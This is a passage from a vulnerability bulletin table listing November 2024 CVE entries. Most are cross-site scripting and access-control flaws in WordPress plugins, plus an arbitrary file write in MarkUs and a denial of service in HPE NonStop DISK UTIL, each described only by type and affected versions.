Missing Authorization vulnerability in Zakaria Binsaifullah Easy Accordion Gutenberg Block allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Easy Accordion Gutenberg Block: from n/a through 1.2.3. | 2024-11-19 | not yet calculated | CVE-2024-51660 |
| n/a -- n/a |
Missing Authorization vulnerability in ThemeIsle Otter - Gutenberg Block allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Otter - Gutenberg Block: from n/a through 3.0.3. | 2024-11-19 | not yet calculated | CVE-2024-51671 |
| n/a -- n/a |
Cross-Site Request Forgery (CSRF) vulnerability in Deepak Khokhar, Surender Khokhar Manage User Columns allows Cross Site Request Forgery.This issue affects Manage User Columns: from n/a through 1.0.5. | 2024-11-19 | not yet calculated | CVE-2024-51686 |
| n/a -- n/a |
MarkUs is a web application for the submission and grading of student assignments. In versions prior to 2.4.8, an arbitrary file write vulnerability in the update/upload/create file methods in Controllers allows authenticated instructors to write arbitrary files to any location on the web server MarkUs is running on (depending on the permissions of the underlying filesystem). e.g. This can lead to a delayed remote code execution in case an attacker is able to write a Ruby file into the config/initializers/ subfolder of the Ruby on Rails application. MarkUs v2.4.8 has addressed this issue. No known workarounds are available at the application level aside from upgrading. | 2024-11-18 | not yet calculated | CVE-2024-51743 |
| n/a -- n/a |
A potential security vulnerability has been identified in the HPE NonStop DISK UTIL (T9208) product. This vulnerability could be exploited to cause a denial of service (DoS) to NonStop server. It exists in all prior DISK UTIL product versions of L-series and J-series. | 2024-11-22 | not yet calculated | CVE-2024-51766 |
| n/a -- n/a |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in NotFound Storely allows Stored XSS.This issue affects Storely: from n/a through 14.7. | 2024-11-19 | not yet calculated | CVE-2024-51794 |
| n/a -- n/a |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in ByteLabX Pdf Embedder Fay allows DOM-Based XSS.This issue affects Pdf Embedder Fay: from n/a through 1.10.1. | 2024-11-19 | not yet calculated | CVE-2024-51795 |
| n/a -- n/a |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in WPManageNinja Trendy Restaurant Menu allows DOM-Based XSS.This issue affects Trendy Restaurant Menu: from n/a through 1.0.0. | 2024-11-19 | not yet calculated | CVE-2024-51796 |
| n/a -- n/a |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Md. Shiddikur Rahman Ultimate Accordion allows DOM-Based XSS.This issue affects Ultimate Accordion: from n/a through 1.0. | 2024-11-19 | not yet calculated | CVE-2024-51797 |
| n/a -- n/a |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Surbma Surbma | Font Awesome allows DOM-Based XSS.This issue affects Surbma | Font Awesome: from n/a through 3.0. | 2024-11-19 | not yet calculated | CVE-2024-51798 |
| n/a -- n/a |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in VBog Bg Patriarchia BU allows DOM-Based XSS.This issue affects Bg Patriarchia BU: from n/a through 2.2.3. | 2024-11-19 | not yet calculated | CVE-2024-51799 |
| n/a -- n/a |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Jake Brown Brand my Footer allows DOM-Based XSS.This issue affects Brand my Footer: from n/a through 1.1. | 2024-11-19 | not yet calculated | CVE-2024-51801 |
| n/a -- n/a |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Bread & Butter IO Inc. Bread & Butter allows DOM-Based XSS.This issue affects Bread & Butter: from n/a through 7.4.857. | 2024-11-19 | not yet calculated | CVE-2024-51802 |
| n/a -- n/a |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Magnetic Creative Inline Click To Tweet allows DOM-Based XSS.This issue affects Inline Click To Tweet: from n/a through 1.0.0. | 2024-11-19 | not yet calculated | CVE-2024-51803 |
| n/a -- n/a |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Bob Matsuoka Moka Get Posts Shortcode allows DOM-Based XSS.This issue affects Moka Get Posts Shortcode: from n/a through 1.0. | 2024-11-19 | not yet calculated | CVE-2024-51804 |
| n/a -- n/a |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Yonatan Reinberg yPHPlista allows Stored XSS.This issue affects yPHPlista: from n/a through 1.1.1. | 2024-11-19 | not yet calculated | CVE-2024-51805 |
| n/a -- n/a |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Shingo Suzumura at Fitness Website Formula Awesome Fitness Testimonials allows Stored XSS.This issue affects Awesome Fitness Testimonials: from n/a through 1.0.1. | 2024-11-19 | not yet calculated | CVE-2024-51806 |
| n/a -- n/a |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Black and White Digital Ltd AgendaPress - Easily Publish Meeting Agendas and Programs on WordPress allows Stored XSS.This issue affects AgendaPress - Easily Publish Meeting Agendas and Programs on WordPress: from n/a through 1.0.8. | 2024-11-19 | not yet calculated | CVE-2024-51807 |
| n/a -- n/a |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Pat O'Brien codeSnips allows Stored XSS.This issue affects codeSnips: from n/a through 1.2. | 2024-11-19 | not yet calculated | CVE-2024-51808 |
| n/a -- n/a |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in George Rood Keymaster Chord Notation Free allows Stored XSS.This issue affects Keymaster Chord Notation Free: from n/a through 1.0.2. | 2024-11-19 | not yet calculated | CVE-2024-51809 |
| n/a -- n/a |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in George Lewe Lewe Bootstrap Visuals allows Stored XSS.This issue affects Lewe Bootstrap Visuals: from n/a through 2.2.2. | 2024-11-19 | not yet calculated | CVE-2024-51810 |
| n/a -- n/a |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Hussam Hussien Popup Image allows Stored XSS.This issue affects Popup Image: from n/a through 1.0.1. | 2024-11-19 | not yet calculated | CVE-2024-51811 |
| n/a -- n/a |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Wasim Pro Addons For Elementor allows Stored XSS.This issue affects Pro Addons For Elementor: from n/a through 1.5.0. | 2024-11-19 | not yet calculated | CVE-2024-51812 |
| n/a -- n/a |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Anantaddons, Anantsites Anant Addons for Elementor allows DOM-Based XSS.This issue affects Anant Addons for Elementor: from n/a through 1.0.5. | 2024-11-19 | not yet calculated | CVE-2024-51813 |
| n/a -- n/a |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in ?? ???????? allows DOM-Based XSS.This issue affects ????????: from n/a through 1.2.0. | 2024-11-19 | not yet calculated | CVE-2024-51814 |
| n/a -- n/a |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Saul Morales Pacheco Banner System allows Stored XSS.This issue affects Banner System: from n/a through 1.0.0. | 2024-11-19 | not yet calculated | CVE-2024-51816 |
| n/a -- n/a |
Missing Authorization vulnerability in CodeZel Combo WP Rewrite Slugs allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Combo WP Rewrite Slugs: from n/a through 1.0. | 2024-11-19 | not yet calculated | CVE-2024-51817 |
| n/a -- n/a |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Tigris - Flexplatform Tigris Flexplatform allows Stored XSS.This issue affects Tigris Flexplatform: from n/a through .0.2. | 2024-11-19 | not yet calculated | CVE-2024-51819 |
| n/a -- n/a |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in wordpresteem WE - Client Logo Carousel allows Stored XSS.This issue affects WE - Client Logo Carousel: from n/a through 1.4. | 2024-11-19 | not yet calculated | CVE-2024-51821 |
| n/a -- n/a |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Keon Themes Creative Blocks allows Stored XSS.This issue affects Creative Blocks: from n/a through 1.0.1. | 2024-11-19 | not yet calculated | CVE-2024-51822 |
| n/a -- n/a |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Sherwin Calims Add Ribbon Shortcode allows DOM-Based XSS.This issue affects Add Ribbon Shortcode: from n/a through 1.0.1. | 2024-11-19 | not yet calculated | CVE-2024-51823 |
| n/a -- n/a |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in sony7596, mrseankumar25, miraclewebssoft Advanced Video Player with Analytics allows DOM-Based XSS.This issue affects Advanced Video Player with Analytics: from n/a through 1. | 2024-11-19 | not yet calculated | CVE-2024-51824 |
| n/a -- n/a |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Cristopher Ocaña Alert Me! allows DOM-Based XSS.This issue affects Alert Me!: from n/a through 0.4.0. | 2024-11-19 | not yet calculated | CVE-2024-51825 |
| n/a -- n/a |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in James Turner Bitcoin Payments allows DOM-Based XSS.This issue affects Bitcoin Payments: from n/a through 1.4.2. | 2024-11-19 | not yet calculated | CVE-2024-51826 |
| n/a -- n/a |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Boombox Boombox Shortcode allows DOM-Based XSS.This issue affects Boombox Shortcode: from n/a through 1.0.0. | 2024-11-19 | not yet calculated | CVE-2024-51827 |
| n/a -- n/a |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Daniel J Griffiths Beacon For Help Scout allows DOM-Based XSS.This issue affects Beacon For Help Scout: from n/a through 1.3.0. | 2024-11-19 | not yet calculated | CVE-2024-51828 |
| n/a -- n/a |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Figoli Quinn & Associates Mobile Kiosk allows Stored XSS.This issue affects Mobile Kiosk: from n/a through 1.3.0. | 2024-11-19 | not yet calculated | CVE-2024-51829 |
| n/a -- n/a |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Fazilatunnesa News Ticker allows Stored XSS.This issue affects News Ticker: from n/a through 1.0. | 2024-11-19 | not yet calculated | CVE-2024-51830 |
| n/a -- n/a |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Aboutorab Pourhaghani Persian Nested Show/Hide Text allows Stored XSS.This issue affects Persian Nested Show/Hide Text: from n/a through 1.5. | 2024-11-19 | not yet calculated | CVE-2024-51831 |
| n/a -- n/a |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Plenigo Plenigo allows Stored XSS.This issue affects Plenigo: from n/a through 1.12.0. | 2024-11-19 | not yet calculated | CVE-2024-51832 |
| n/a -- n/a |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Noman Akhtar Easy Social Sharebar allows Stored XSS.This issue affects Easy Social Sharebar: from n/a through 1.0.0. | 2024-11-19 | not yet calculated | CVE-2024-51833 |
| n/a -- n/a |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Luzuk Luzuk Slider allows Stored XSS.This issue affects Luzuk Slider: from n/a through 0.1.5. | 2024-11-19 | not yet calculated | CVE-2024-51834 |
| n/a -- n/a |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Ajinkya N OpenCart Product Display allows Stored XSS.This issue affects OpenCart Product Display: from n/a through 1.0. | 2024-11-19 | not yet calculated | CVE-2024-51835 |
| n/a -- n/a |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Teconce Wezido allows DOM-Based XSS.This issue affects Wezido: from n/a through 1.2. | 2024-11-19 | not yet calculated | CVE-2024-51836 |
| n/a -- n/a |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Jon Smajda Pull This allows DOM-Based XSS.This issue affects Pull This: from n/a through 1.1. | 2024-11-19 | not yet calculated | CVE-2024-51838 |
| n/a -- n/a |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Meini Utech Spinning Earth allows DOM-Based XSS.This issue affects Utech Spinning Earth: from n/a through 1.2. | 2024-11-19 | not yet calculated | CVE-2024-51839 |
| n/a -- n/a |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Rezaul haque Wd-image-magnifier-xoss allows DOM-Based XSS.This issue affects Wd-image-magnifier-xoss: from n/a through 1.0. | 2024-11-19 | not yet calculated | CVE-2024-51840 |
| n/a -- n/a |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in ThemeNcode File Select Control For Elementor allows DOM-Based XSS.This issue affects File Select Control For Elementor: from n/a through 1.3. | 2024-11-19 | not yet calculated | CVE-2024-51841 |
| n/a -- n/a |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Sazzad Hu Image Carousel Shortcode allows DOM-Based XSS.This issue affects Image Carousel Shortcode: from n/a through 1.2. | 2024-11-19 | not yet calculated | CVE-2024-51842 |
| n/a -- n/a |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Kiran Patil Location Click Map allows Stored XSS.This issue affects Location Click Map: from n/a through 1.0. | 2024-11-19 | not yet calculated | CVE-2024-51844 |
| n/a -- n/a |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Michael Simpson Community Yard Sale allows Stored XSS.This issue affects Community Yard Sale: from n/a through 1.1.11. | 2024-11-19 | not yet calculated | CVE-2024-51846 |
| n/a -- n/a |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in giovanebribeiro WP PagSeguro Payments allows Stored XSS.This issue affects WP PagSeguro Payments: from n/a through 1.0. | 2024-11-19 | not yet calculated | CVE-2024-51847 |
| n/a -- n/a |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Digital Zoom Studio Parallaxer allows Stored XSS.This issue affects Parallaxer: from n/a through 1.00. | 2024-11-19 | not yet calculated | CVE-2024-51848 |
| n/a -- n/a |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Marco Piarulli My Restaurant Menu allows Stored XSS.This issue affects My Restaurant Menu: from n/a through 0.2.0. | 2024-11-19 | not yet calculated | CVE-2024-51849 |
| n/a -- n/a |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in bchristopeit WoW Guild Armory Roster allows Stored XSS.This issue affects WoW Guild Armory Roster: from n/a through 0.5.5. | 2024-11-19 | not yet calculated | CVE-2024-51850 |
| n/a -- n/a |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in saleh attari best bootstrap widgets for elementor allows DOM-Based XSS.This issue affects best bootstrap widgets for elementor: from n/a through 1.0. | 2024-11-19 | not yet calculated | CVE-2024-51851 |
| n/a -- n/a |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in DynamicWebLab Dynamic Post Grid Elementor Addon allows DOM-Based XSS.This issue affects Dynamic Post Grid Elementor Addon: from n/a through 1.0.6. | 2024-11-19 | not yet calculated | CVE-2024-51852 |
| n/a -- n/a |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Alberuni Azad Faltu Testimonial Rotator allows DOM-Based XSS.This issue affects Faltu Testimonial Rotator: from n/a through 1.0.0. | 2024-11-19 | not yet calculated | CVE-2024-51853 |
| n/a -- n/a |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Hola Networks Hola Free Video Player allows DOM-Based XSS.This issue affects Hola Free Video Player: from n/a through 1.3.9. | 2024-11-19 | not yet calculated | CVE-2024-51854 |
| n/a -- n/a |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Productineer Redirecter allows DOM-Based XSS.This issue affects Redirecter: from n/a through 1.0. | 2024-11-19 | not yet calculated | CVE-2024-51855 |
| n/a -- n/a |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in WP Moose Moose Elementor Kit allows DOM-Based XSS.This issue affects Moose Elementor Kit: from n/a through 1.0.0. | 2024-11-19 | not yet calculated | CVE-2024-51856 |
| n/a -- n/a |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Olympus Themes Olympus Shortcodes allows DOM-Based XSS.This issue affects Olympus Shortcodes: from n/a through 1.0.4. | 2024-11-19 | not yet calculated | CVE-2024-51857 |
| n/a -- n/a |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Umar Social Locker allows Stored XSS.This issue affects Social Locker: from n/a through 1.1. | 2024-11-19 | not yet calculated | CVE-2024-51858 |
| n/a -- n/a |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Bamboo Mcr Bamboo Enquiries allows Stored XSS.This issue affects Bamboo Enquiries: from n/a through 1.9.3. | 2024-11-19 | not yet calculated | CVE-2024-51859 |
| n/a -- n/a |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in DuoGeek Custom Dashboard Widget allows Stored XSS.This issue affects Custom Dashboard Widget: from n/a through 1.0.0. | 2024-11-19 | not yet calculated | CVE-2024-51860 |
| n/a -- n/a |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in duogeek EventPress allows Stored XSS.This issue affects EventPress: from n/a through 1.0.0. | 2024-11-19 | not yet calculated | CVE-2024-51861 |
| n/a -- n/a |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Baptiste Wicht Google Visualization Charts allows Stored XSS.This issue affects Google Visualization Charts: from n/a through 0.1. | 2024-11-19 | not yet calculated | CVE-2024-51862 |
| n/a -- n/a |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Team Profit-Funnels PF Timer allows Stored XSS.This issue affects PF Timer: from n/a through 1.0.0. | 2024-11-19 | not yet calculated | CVE-2024-51863 |
| n/a -- n/a |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Agnel Waghela Shortcode Collection allows Stored XSS.This issue affects Shortcode Collection: from n/a through 1.4. | 2024-11-19 | not yet calculated | CVE-2024-51864 |
| n/a -- n/a |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in N.O.U.S. Open Useful and Simple Simple Social Share Block allows Stored XSS.This issue affects Simple Social Share Block: from n/a through 1.0.0. | 2024-11-19 | not yet calculated | CVE-2024-51865 |
| n/a -- n/a |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Mr. Riponshah Social button allows Stored XSS.This issue affects Social button: from n/a through 1.3. | 2024-11-19 | not yet calculated | CVE-2024-51866 |
| n/a -- n/a |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Alexander Conroy Simpul Events by Esotech allows Stored XSS.This issue affects Simpul Events by Esotech: from n/a through 1.8.5. | 2024-11-19 | not yet calculated | CVE-2024-51867 |
| n/a -- n/a |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in DuoGeek DuoGeek Blocks allows Stored XSS.This issue affects DuoGeek Blocks: from n/a through .1. | 2024-11-19 | not yet calculated | CVE-2024-51868 |
| n/a -- n/a |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Best WP Developer Gutenium Blocks allows Stored XSS.This issue affects Gutenium Blocks: from n/a through 1.1.5. | 2024-11-19 | not yet calculated | CVE-2024-51869 |
| n/a -- n/a |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in aniketji007 Ultimate Flipbox Addon for Elementor allows Stored XSS.This issue affects Ultimate Flipbox Addon for Elementor: from n/a through .4. | 2024-11-19 | not yet calculated | CVE-2024-51870 |
| n/a -- n/a |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Luzuk Luzuk Team allows Stored XSS.This issue affects Luzuk Team: from n/a through 0.1.0. | 2024-11-19 | not yet calculated | CVE-2024-51871 |
| n/a -- n/a |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Luzuk Luzuk Testimonials allows Stored XSS.This issue affects Luzuk Testimonials: from n/a through 0.0.1. | 2024-11-19 | not yet calculated | CVE-2024-51872 |
| n/a -- n/a |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in matorel Multi-day Booking Calendar allows DOM-Based XSS.This issue affects Multi-day Booking Calendar: from n/a through 1.0.1. | 2024-11-19 | not yet calculated | CVE-2024-51873 |
| n/a -- n/a |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in ParOne, Inc. ParOne Feeds allows DOM-Based XSS.This issue affects ParOne Feeds: from n/a through 1.17.1. | 2024-11-19 | not yet calculated | CVE-2024-51874 |
| n/a -- n/a |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Nazmul Ahsan MDC YouTube Downloader allows DOM-Based XSS.This issue affects MDC YouTube Downloader: from n/a through 3.0.0. | 2024-11-19 | not yet calculated | CVE-2024-51875 |
| n/a -- n/a |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Codstack Team wp_automatic_widget allows DOM-Based XSS.This issue affects wp_automatic_widget: from n/a through 1.0.1. | 2024-11-19 | not yet calculated | CVE-2024-51876 |
| n/a -- n/a |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in straightvisions GmbH SV Forms allows DOM-Based XSS.This issue affects SV Forms: from n/a through 2.0.05. | 2024-11-19 | not yet calculated | CVE-2024-51877 |
| n/a -- n/a |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Joey Straile AchillesTheme-shortcodes allows DOM-Based XSS.This issue affects AchillesTheme-shortcodes: from n/a through 0.1. | 2024-11-19 | not yet calculated | CVE-2024-51878 |
| n/a -- n/a |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Arash Heidari Text Advertisements allows Stored XSS.This issue affects Text Advertisements: from n/a through 2.1. | 2024-11-19 | not yet calculated | CVE-2024-51879 |
| n/a -- n/a |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in BeBetter Hotels BeBetter Social Icons allows DOM-Based XSS.This issue affects BeBetter Social Icons: from n/a through 2.7. | 2024-11-19 | not yet calculated | CVE-2024-51880 |
| n/a -- n/a |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Beautimour Be Shortcodes allows DOM-Based XSS.This issue affects Be Shortcodes: from n/a through 1.0.0. | 2024-11-19 | not yet calculated | CVE-2024-51881 |
| n/a -- n/a |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Micha I Plant A Tree allows Stored XSS.This issue affects I Plant A Tree: from n/a through 1.7.3. | 2024-11-19 | not yet calculated | CVE-2024-51883 |
| n/a -- n/a |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Takashi Matsuyama Posts Search allows Stored XSS.This issue affects Posts Search: from n/a through 1.2.2. | 2024-11-19 | not yet calculated | CVE-2024-51884 |
| n/a -- n/a |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Takashi Matsuyama Browsing History allows Stored XSS.This issue affects Browsing History: from n/a through 1.3.1. | 2024-11-19 | not yet calculated | CVE-2024-51885 |
| n/a -- n/a |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Takashi Matsuyama Posts Filter allows Stored XSS.This issue affects Posts Filter: from n/a through 1.3.1. | 2024-11-19 | not yet calculated | CVE-2024-51886 |
| n/a -- n/a |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Ryan Sutana NV Slider allows Stored XSS.This issue affects NV Slider: from n/a through 1.6. | 2024-11-19 | not yet calculated | CVE-2024-51887 |
| n/a -- n/a |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in GeroNikolov Fancy User List allows Stored XSS.This issue affects Fancy User List: from n/a through 3.1. | 2024-11-19 | not yet calculated | CVE-2024-51889 |
| n/a -- n/a |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in geoWP Geoportail Shortcode allows Stored XSS.This issue affects Geoportail Shortcode: from n/a through 2.4.4. | 2024-11-19 | not yet calculated | CVE-2024-51890 |
| n/a -- n/a |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in 4B Systems sp. z o.o Official SalesWizard CRM Plugin allows Stored XSS.This issue affects Official SalesWizard CRM Plugin: from n/a through 1.0.2. | 2024-11-19 | not yet calculated | CVE-2024-51891 |
| n/a -- n/a |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in naa986 Sell Media File with Stripe allows Stored XSS.This issue affects Sell Media File with Stripe: from n/a through 1.0.6. | 2024-11-19 | not yet calculated | CVE-2024-51892 |
| n/a -- n/a |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in ThemeAtelier Postify: Post Layout For Elementor allows DOM-Based XSS.This issue affects Postify: Post Layout For Elementor: from n/a through 1.0.1. | 2024-11-19 | not yet calculated | CVE-2024-51893 |
| n/a -- n/a |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Reyzua Topbar ID for Elementor allows DOM-Based XSS.This issue affects Topbar ID for Elementor: from n/a through 1.0.1. | 2024-11-19 | not yet calculated | CVE-2024-51894 |
| n/a -- n/a |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Minical Minical Hotel Booking Plugin allows Stored XSS.This issue affects Minical Hotel Booking Plugin: from n/a through 1.0.2. | 2024-11-19 | not yet calculated | CVE-2024-51895 |
| n/a -- n/a |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in webvitaly Magic Slider allows Stored XSS.This issue affects Magic Slider: from n/a through 1.3. | 2024-11-19 | not yet calculated | CVE-2024-51896 |
| n/a -- n/a |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Erik Saulnier News Articles allows Stored XSS.This issue affects News Articles: from n/a through 1.0.0. | 2024-11-19 | not yet calculated | CVE-2024-51897 |
| n/a -- n/a |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Sachin Jadhav Semantic Shortcode allows Stored XSS.This issue affects Semantic Shortcode: from n/a through 1.0.1. | 2024-11-19 | not yet calculated | CVE-2024-51898 |
| n/a -- n/a |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in SEO Themes Simple Pricing Table allows Stored XSS.This issue affects Simple Pricing Table: from n/a through 1.0.0. | 2024-11-19 | not yet calculated | CVE-2024-51899 |
| n/a -- n/a |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Wojciech Borowicz Smooth Maps allows Stored XSS.This issue affects Smooth Maps: from n/a through 1.1. | 2024-11-19 | not yet calculated | CVE-2024-51901 |
| n/a -- n/a |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Oliver Schaal TinyCode allows Stored XSS.This issue affects TinyCode: from n/a through 1.2.1. | 2024-11-19 | not yet calculated | CVE-2024-51902 |
| n/a -- n/a |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in imFORZA WP Listings Pro allows Stored XSS.This issue affects WP Listings Pro: from n/a through 3.0.14. | 2024-11-19 | not yet calculated | CVE-2024-51903 |
| n/a -- n/a |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Joan Boluda Embed documents shortcode allows Stored XSS.This issue affects Embed documents shortcode: from n/a through 1.5. | 2024-11-19 | not yet calculated | CVE-2024-51904 |
| n/a -- n/a |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Ravi & Suma RSV PDF Preview allows Stored XSS.This issue affects RSV PDF Preview: from n/a through 1.0. | 2024-11-19 | not yet calculated | CVE-2024-51905 |
| n/a -- n/a |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Rapid Sort RSV 360 View allows DOM-Based XSS.This issue affects RSV 360 View: from n/a through 1.0. | 2024-11-19 | not yet calculated | CVE-2024-51906 |
| n/a -- n/a |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in codemenschen WP Virtual Room Configurator allows Stored XSS.This issue affects WP Virtual Room Configurator: from n/a through 1.0.0. | 2024-11-19 | not yet calculated | CVE-2024-51907 |
| n/a -- n/a |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Gonzalo Geraldo Adventure Bucket List allows DOM-Based XSS.This issue affects Adventure Bucket List: from n/a through 1.0.9. | 2024-11-19 | not yet calculated | CVE-2024-51908 |
| n/a -- n/a |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Monarkie Digital Content Solutions audioCase allows DOM-Based XSS.This issue affects audioCase: from n/a through 1.2.1. | 2024-11-19 | not yet calculated | CVE-2024-51909 |
| n/a -- n/a |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Mauro Cordioli Assist24 Help Desk allows DOM-Based XSS.This issue affects Assist24 Help Desk: from n/a through 20150401.2. | 2024-11-19 | not yet calculated | CVE-2024-51910 |
| n/a -- n/a |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Ketan Patel Featured product by category name allows DOM-Based XSS.This issue affects Featured product by category name: from n/a through 1.1. | 2024-11-19 | not yet calculated | CVE-2024-51911 |
| n/a -- n/a |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Lilaea Media IntelliWidget Elements allows DOM-Based XSS.This issue affects IntelliWidget Elements: from n/a through 2.2.7. | 2024-11-19 | not yet calculated | CVE-2024-51912 |
| n/a -- n/a |
